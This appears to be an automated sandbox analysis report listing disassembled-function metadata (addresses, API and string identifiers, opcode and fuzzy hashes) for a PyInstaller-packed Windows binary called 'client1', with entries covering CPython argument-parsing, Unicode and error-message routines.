                                                    • Associated: 00000002.00000002.2693226656.00007FFBAA728000.00000008.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693243662.00007FFBAA729000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693259098.00007FFBAA72A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
                                                    • API ID: FreeMem_$memmove
                                                    • String ID: 0
                                                    • API String ID: 1110261380-4108050209
                                                    • Opcode ID: 578dc20f3f21576e8635ac31585abfacd8f4d8398d0bf0b0a976cab2b38d83de
                                                    • Instruction ID: 41f5b8f271904d105367cb236e0d197664c3ea986dfb2bb17ceadeee6a4b3658
                                                    • Opcode Fuzzy Hash: 578dc20f3f21576e8635ac31585abfacd8f4d8398d0bf0b0a976cab2b38d83de
                                                    • Instruction Fuzzy Hash: 88A1E2A2E19781C4E712CF74E8503FE2B64FB85B84F442176EE8D12A5ADF38D54ACB10
                                                    Function 00007FFBAA70F364 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 120COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    • Associated: 00000002.00000002.2693151925.00007FFBAA6F0000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693193696.00007FFBAA719000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693211520.00007FFBAA727000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693226656.00007FFBAA728000.00000008.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693243662.00007FFBAA729000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693259098.00007FFBAA72A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
                                                    • API ID: Dealloc$Arg_Err_KeywordsParseStringTuple
                                                    • String ID: O|O$optional argument must be a context
                                                    • API String ID: 2016884933-2061368271
                                                    • Opcode ID: 574a8ccfe6566982d4148d17103293e808cfc1d4d4060992ebbec751c0671dbf
                                                    • Instruction ID: 72a2b5b1c419f923bd1040ed63fa97112c0ba87ddbc44f62a6cb2c8bf67576c2
                                                    • Opcode Fuzzy Hash: 574a8ccfe6566982d4148d17103293e808cfc1d4d4060992ebbec751c0671dbf
                                                    • Instruction Fuzzy Hash: E7512BB2A0AB02D4EB128F75D8500BE37A8EB44B98B4454B2DE4D676A5DE3CE147C360
                                                    Function 00007FFBAA6F12CC Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 117COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    • Associated: 00000002.00000002.2693151925.00007FFBAA6F0000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693193696.00007FFBAA719000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693211520.00007FFBAA727000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693226656.00007FFBAA728000.00000008.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693243662.00007FFBAA729000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693259098.00007FFBAA72A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
                                                    • API ID: Dealloc$Arg_ContextErr_KeywordsParseStringTupleVar_
                                                    • String ID: O|O$optional argument must be a context
                                                    • API String ID: 3219279049-2061368271
                                                    • Opcode ID: a241f30da18124602282b36e2f4db3156f825cf5067a90acde80afe06cafb2da
                                                    • Instruction ID: 935f3d87757fb87de1674df75539a232c7a8e286e2c0d6b1e3845dae3e05f81d
                                                    • Opcode Fuzzy Hash: a241f30da18124602282b36e2f4db3156f825cf5067a90acde80afe06cafb2da
                                                    • Instruction Fuzzy Hash: CE513CB2E1AA02C4EB168F75D8500BD27A8BB44B98F4410B6DF0D17AA5DE3CE54B8760
                                                    Function 00007FFBAA6F1764 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 117COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    • Associated: 00000002.00000002.2693151925.00007FFBAA6F0000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693193696.00007FFBAA719000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693211520.00007FFBAA727000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693226656.00007FFBAA728000.00000008.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693243662.00007FFBAA729000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693259098.00007FFBAA72A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
                                                    • API ID: Dealloc$Arg_ContextErr_KeywordsParseStringTupleVar_
                                                    • String ID: O|O$optional argument must be a context
                                                    • API String ID: 3219279049-2061368271
                                                    • Opcode ID: ab999bfe57dcf0f4dce92a34d45723871f4fc948754a0e840bb376c75d37db95
                                                    • Instruction ID: 63f6fd7e0ee12bfeabaeaf8d4671ec7e946ffc8f7097d77ca5a934a31eb41150
                                                    • Opcode Fuzzy Hash: ab999bfe57dcf0f4dce92a34d45723871f4fc948754a0e840bb376c75d37db95
                                                    • Instruction Fuzzy Hash: C8515BB1E0AB02C5FB128F75D9500BE67A8BB44B98B441172DE0D177A4DF3CE54AC760
                                                    Function 00007FFBAA70EC8C Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 117COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    • Associated: 00000002.00000002.2693151925.00007FFBAA6F0000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693193696.00007FFBAA719000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693211520.00007FFBAA727000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693226656.00007FFBAA728000.00000008.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693243662.00007FFBAA729000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693259098.00007FFBAA72A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
                                                    • API ID: Dealloc$Arg_ContextErr_KeywordsParseStringTupleVar_
                                                    • String ID: O|O$optional argument must be a context
                                                    • API String ID: 3219279049-2061368271
                                                    • Opcode ID: cc8f777678b49610bb8c6ee1ee4a4c312f086dd662901ee9ca0687c12df104ef
                                                    • Instruction ID: 02aa56e0dbb51440c48e14204a4239e4a6a35e73d8aeeb3152ea149170e2d81a
                                                    • Opcode Fuzzy Hash: cc8f777678b49610bb8c6ee1ee4a4c312f086dd662901ee9ca0687c12df104ef
                                                    • Instruction Fuzzy Hash: 44512DB1A0AA02D4FB129F75E8500BE27B8EB44B98B440072DE0D277A5DF3CE546C360
                                                    Function 00007FFBAA6F1454 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 117COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    • Associated: 00000002.00000002.2693151925.00007FFBAA6F0000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693193696.00007FFBAA719000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693211520.00007FFBAA727000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693226656.00007FFBAA728000.00000008.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693243662.00007FFBAA729000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693259098.00007FFBAA72A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
                                                    • API ID: Dealloc$Arg_ContextErr_KeywordsParseStringTupleVar_
                                                    • String ID: O|O$optional argument must be a context
                                                    • API String ID: 3219279049-2061368271
                                                    • Opcode ID: b846fa4a5d7939c81dc4ec99d25748bc181cfee3e508912f3e3e4c184f5e83f3
                                                    • Instruction ID: 2413605dc8a0544bc19256495142ac12c71415cedef5fa5d4474e22a8eb59838
                                                    • Opcode Fuzzy Hash: b846fa4a5d7939c81dc4ec99d25748bc181cfee3e508912f3e3e4c184f5e83f3
                                                    • Instruction Fuzzy Hash: A6514DB1E1AA02C5EB128F75D8500BE37A8BB45B98B441072DF0E176A5DF3DE54AC760
                                                    Function 00007FFBAA6F1EFC Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 116COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    • Associated: 00000002.00000002.2693151925.00007FFBAA6F0000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693193696.00007FFBAA719000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693211520.00007FFBAA727000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693226656.00007FFBAA728000.00000008.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693243662.00007FFBAA729000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693259098.00007FFBAA72A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
                                                    • API ID: Dealloc$Arg_ContextErr_KeywordsParseStringTupleVar_
                                                    • String ID: O|O$optional argument must be a context
                                                    • API String ID: 3219279049-2061368271
                                                    • Opcode ID: 19533874d08f7c2fc8b94f5bd85e940f0e443b2d42272517b40c78f9ac2bec4c
                                                    • Instruction ID: f83443e8c4e20b104641afbb685dbb5907db00b8add81ed1a639878e6e318274
                                                    • Opcode Fuzzy Hash: 19533874d08f7c2fc8b94f5bd85e940f0e443b2d42272517b40c78f9ac2bec4c
                                                    • Instruction Fuzzy Hash: A3512EB2E0AB02C4EB128F79D8500BD37A8BB48B98B441076DE5D17665DF3DE54BCB60
                                                    Function 00007FFBAA6F1BF4 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 116COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    • Associated: 00000002.00000002.2693151925.00007FFBAA6F0000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693193696.00007FFBAA719000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693211520.00007FFBAA727000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693226656.00007FFBAA728000.00000008.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693243662.00007FFBAA729000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693259098.00007FFBAA72A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
                                                    • API ID: Dealloc$Arg_ContextErr_KeywordsParseStringTupleVar_
                                                    • String ID: O|O$optional argument must be a context
                                                    • API String ID: 3219279049-2061368271
                                                    • Opcode ID: ffb6b960d61a31724b55b6c081cf373cb344c0d0d53ec74fbf3cad31bedf7cee
                                                    • Instruction ID: becb9dbbb225694e7d0eb0efdd3e0e6da3497372748b2bce60108d20c278b0e8
                                                    • Opcode Fuzzy Hash: ffb6b960d61a31724b55b6c081cf373cb344c0d0d53ec74fbf3cad31bedf7cee
                                                    • Instruction Fuzzy Hash: F3512CB2E0AA02C4EB128F79D8500BE27B8FB48B98B441076DE0D57665DF3DE54BC760
                                                    Function 00007FFBAA6F2080 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 116COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    • Associated: 00000002.00000002.2693151925.00007FFBAA6F0000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693193696.00007FFBAA719000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693211520.00007FFBAA727000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693226656.00007FFBAA728000.00000008.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693243662.00007FFBAA729000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693259098.00007FFBAA72A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
                                                    • API ID: Dealloc$Arg_ContextErr_KeywordsParseStringTupleVar_
                                                    • String ID: O|O$optional argument must be a context
                                                    • API String ID: 3219279049-2061368271
                                                    • Opcode ID: 144fd626d661ad61bd7f3fab93573c628bc4b77aa65777795e4af42777ad9545
                                                    • Instruction ID: dc4e91070dd7584763daec9f88f61275dd207353328fdff9e2d354c88c5b2979
                                                    • Opcode Fuzzy Hash: 144fd626d661ad61bd7f3fab93573c628bc4b77aa65777795e4af42777ad9545
                                                    • Instruction Fuzzy Hash: D4511EB1E0AA02D4EF129F75DC500BE27B8BB48B94B441076DF0D17669DE3CE54ACB64
                                                    Function 00007FFBAA70F128 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 116COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    • Associated: 00000002.00000002.2693151925.00007FFBAA6F0000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693193696.00007FFBAA719000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693211520.00007FFBAA727000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693226656.00007FFBAA728000.00000008.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693243662.00007FFBAA729000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693259098.00007FFBAA72A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
                                                    • API ID: Dealloc$Arg_ContextErr_KeywordsParseStringTupleVar_
                                                    • String ID: O|O$optional argument must be a context
                                                    • API String ID: 3219279049-2061368271
                                                    • Opcode ID: 6f414346e7b95e70e0ab35dc629cea110c72f8eeeb694970f28da25fcffa6397
                                                    • Instruction ID: d4ab4c9e74f96e151ae8c03b454932c170921756b120bcfeccb061964f8be695
                                                    • Opcode Fuzzy Hash: 6f414346e7b95e70e0ab35dc629cea110c72f8eeeb694970f28da25fcffa6397
                                                    • Instruction Fuzzy Hash: 28511CB6E0AB02D4EB128F75D8500BE27A8BB48B98B540472DE4D27669DF3CE547C364
                                                    Function 00007FFBAA6F18EC Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 116COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    • Associated: 00000002.00000002.2693151925.00007FFBAA6F0000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693193696.00007FFBAA719000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693211520.00007FFBAA727000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693226656.00007FFBAA728000.00000008.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693243662.00007FFBAA729000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693259098.00007FFBAA72A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
                                                    • API ID: Dealloc$Arg_ContextErr_KeywordsParseStringTupleVar_
                                                    • String ID: O|O$optional argument must be a context
                                                    • API String ID: 3219279049-2061368271
                                                    • Opcode ID: 5f6c06ac62897f5fab9e98e8ec98f0c6eb285b5602e67e0a2f60853e5626fac4
                                                    • Instruction ID: 45cd6dd4578c052d900b2dcbdc6fc2201f481d30b5f52cc51b6ee543cba07723
                                                    • Opcode Fuzzy Hash: 5f6c06ac62897f5fab9e98e8ec98f0c6eb285b5602e67e0a2f60853e5626fac4
                                                    • Instruction Fuzzy Hash: 71510DB1E0AB02C4EB128F75D8500BD27A8FB49B98B4410B7DE4D57669DF3CE54AC760
                                                    Function 00007FFBAA70F52C Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 105COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    • Associated: 00000002.00000002.2693151925.00007FFBAA6F0000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693193696.00007FFBAA719000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693211520.00007FFBAA727000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693226656.00007FFBAA728000.00000008.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693243662.00007FFBAA729000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693259098.00007FFBAA72A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
                                                    • API ID: Dealloc$Arg_ContextErr_KeywordsParseStringTupleVar_
                                                    • String ID: O|O$optional argument must be a context
                                                    • API String ID: 3219279049-2061368271
                                                    • Opcode ID: 37d7a4b5c7b375be109cd562857698cbc24862b68caa231ab8609c38e56e2630
                                                    • Instruction ID: cc24b9a84622b7e5872fbbfe900241a13d7966cb084b0fc7b75c3cde8cd58fc0
                                                    • Opcode Fuzzy Hash: 37d7a4b5c7b375be109cd562857698cbc24862b68caa231ab8609c38e56e2630
                                                    • Instruction Fuzzy Hash: 7B413EB2A0AB02D4EB129F75D8504BA3BBCEB48B98B441176DE0D137A5DE3DE547C360
                                                    Function 00007FFBAB499DD0 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 93COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    • Associated: 00000002.00000002.2695413787.00007FFBAB490000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695456347.00007FFBAB4A4000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695478650.00007FFBAB4AA000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695501720.00007FFBAB4AE000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbab490000_client1.jbxd
                                                    Similarity
                                                    • API ID: DeallocErr_ItemObject_$Dict_ErrorObjectOccurredVectorcallWith
                                                    • String ID: bool$feed
                                                    • API String ID: 2902451266-2849697477
                                                    • Opcode ID: 5fb1090c9fbe94a1abe1cc5096318bf41d88c1455b742f9e041b56343bd14805
                                                    • Instruction ID: 984e0cc947a455c6978f26ccb129819cf40240d73668c22629367d2aea137cb7
                                                    • Opcode Fuzzy Hash: 5fb1090c9fbe94a1abe1cc5096318bf41d88c1455b742f9e041b56343bd14805
                                                    • Instruction Fuzzy Hash: F6411EB5A0BA0292EE629F76E49527D63A0FF48B84F18C135DE6E077B5DF2CE4408350
                                                    Function 00007FFBAA731000 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 61COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693290777.00007FFBAA731000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFBAA730000, based on PE: true
                                                    • Associated: 00000002.00000002.2693275344.00007FFBAA730000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA735000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA792000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA7DE000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA7E1000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA7E6000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA840000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693474597.00007FFBAA843000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693491810.00007FFBAA845000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa730000_client1.jbxd
                                                    Similarity
                                                    • API ID: Unicode_$Arg_$ArgumentCompareReadyStringWith$CheckPositionalSubtypeType_
                                                    • String ID: argument 1$argument 2$normalize$str
                                                    • API String ID: 3621440800-1320425463
                                                    • Opcode ID: 94348148c340fa5468beab9ef1746397c69e42e894d14843631ab3fa4ea44381
                                                    • Instruction ID: 977e28c51aae911f95894bd0b3211ebb9eff69e3c0b86fb62f907b7e16e30984
                                                    • Opcode Fuzzy Hash: 94348148c340fa5468beab9ef1746397c69e42e894d14843631ab3fa4ea44381
                                                    • Instruction Fuzzy Hash: 052181E1B1A687D1EA62AF35E44817A2368AF04B98F5A42B5CE5D476E4CF2CD447C330
                                                    Function 00007FFBAA7347DC Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 58COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693290777.00007FFBAA731000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFBAA730000, based on PE: true
                                                    • Associated: 00000002.00000002.2693275344.00007FFBAA730000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA735000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA792000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA7DE000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA7E1000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA7E6000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA840000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693474597.00007FFBAA843000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693491810.00007FFBAA845000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa730000_client1.jbxd
                                                    Similarity
                                                    • API ID: Arg_$ArgumentReadyUnicode_$CheckPositional
                                                    • String ID: argument 1$argument 2$is_normalized$str
                                                    • API String ID: 396090033-184702317
                                                    • Opcode ID: c961abb42e83fbff4e8e9473619491438f798cfd5e47330d0c83c04a8f602896
                                                    • Instruction ID: 0de68c8757105bee458038aa11aabf05e44d0da929d51482c2fd4f982031407d
                                                    • Opcode Fuzzy Hash: c961abb42e83fbff4e8e9473619491438f798cfd5e47330d0c83c04a8f602896
                                                    • Instruction Fuzzy Hash: 3121F2E0B0AA97C5E7529F35E8442B62368AF04B98F5541B1CE6D072E4CFACE447C330
                                                    Function 00007FF79F6274B0 Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 52windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetLastError.KERNEL32(00000000,00007FF79F6226A0), ref: 00007FF79F6274D7
                                                    • FormatMessageW.KERNEL32(00000000,00007FF79F6226A0), ref: 00007FF79F627506
                                                    • WideCharToMultiByte.KERNEL32 ref: 00007FF79F62755C
                                                      • Part of subcall function 00007FF79F622620: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF79F627744,?,?,?,?,?,?,?,?,?,?,?,00007FF79F62101D), ref: 00007FF79F622654
                                                      • Part of subcall function 00007FF79F622620: MessageBoxW.USER32 ref: 00007FF79F62272C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000002.00000002.2693018203.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693061814.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F660000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693132419.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: ErrorLastMessage$ByteCharFormatMultiWide
                                                    • String ID: Failed to encode wchar_t as UTF-8.$FormatMessageW$No error messages generated.$PyInstaller: FormatMessageW failed.$PyInstaller: pyi_win32_utils_to_utf8 failed.$WideCharToMultiByte
                                                    • API String ID: 2920928814-2573406579
                                                    • Opcode ID: 8b0166d5a5045c769a8e77ad43af0852bc728ff9b5502801be361ecb61f6b2fa
                                                    • Instruction ID: 3f8bcb08a4949239cf5d499b2be8be6b3ea2e7926f57f98021b190ace911d838
                                                    • Opcode Fuzzy Hash: 8b0166d5a5045c769a8e77ad43af0852bc728ff9b5502801be361ecb61f6b2fa
                                                    • Instruction Fuzzy Hash: 85213E71A18B8282E730BF31EC406E6E26BFB88394FC40135D56D926A4EF7CE145C721
